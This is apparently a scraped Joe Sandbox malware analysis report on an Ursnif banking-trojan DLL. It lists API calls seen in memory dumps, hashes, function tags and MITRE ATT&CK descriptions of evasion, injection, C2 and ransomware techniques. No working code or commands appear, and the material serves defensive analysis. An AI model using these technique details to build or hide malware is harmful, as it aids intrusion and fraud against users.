memcpy.NTDLL(00000000,004F0053,747169A0,?,?,045E627D,004F0053,04FF93CC,?,?,?,?,?,?,045E521B), ref: 045E2664
memcpy.NTDLL(747169A0,045E627D,00000002,00000000,004F0053,747169A0,?,?,045E627D,004F0053,04FF93CC), ref: 045E2677

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: aed58d9c1d1d3258a7033f03c413dc30fd66460ba98de6691f3aa076fe3fd468
Instruction ID: 27145afd3a698e85b7257f750407470b299c479a322ac661134d3becaf999113
Opcode Fuzzy Hash: aed58d9c1d1d3258a7033f03c413dc30fd66460ba98de6691f3aa076fe3fd468
Instruction Fuzzy Hash: 25F04F76900119FB8F15DFA9CC84CDE7BACFF482947014062FD04D7201E631EA14EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 045E6311 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04FF9BB8,00000000,00000000,00000000,045E385C,00000000), ref: 045E6321
lstrlen.KERNEL32(?), ref: 045E6329

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

lstrcpy.KERNEL32(00000000,04FF9BB8), ref: 045E633D
lstrcat.KERNEL32(00000000,?), ref: 045E6348

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 4d37fa5554060aeee7be566e3f5b93f4197020bf200b8b183c2ce5c3decf3398
Instruction ID: 250daa97d2fe5142f934e3aadf331cc88831a184942a2423a10505fdaa27cce8
Opcode Fuzzy Hash: 4d37fa5554060aeee7be566e3f5b93f4197020bf200b8b183c2ce5c3decf3398
Instruction Fuzzy Hash: EBE092B3501621A78715ABAAAC48C6FFBADFFCD760304041AF600D7100C7299D05ABA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ursnif_IAT_corrected.exe.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Windows Analysis Report
ursnif_IAT_corrected.exe.dll

Function 10001000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139
sleepnativesynchronizationCOMMON

Function 10001C65 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81
filetimeCOMMON

Function 10001BA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 100015BD Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 10001D37 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 10001D80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Function 100016C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32
threadinjectionCOMMON

Function 10001A9E Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 100012D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
memoryCOMMON

Function 1000177A Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 100017E8 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
COMMON

Function 100013BB Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Function 10001B82 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 10001911 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 100020CA Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 1000204A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
COMMON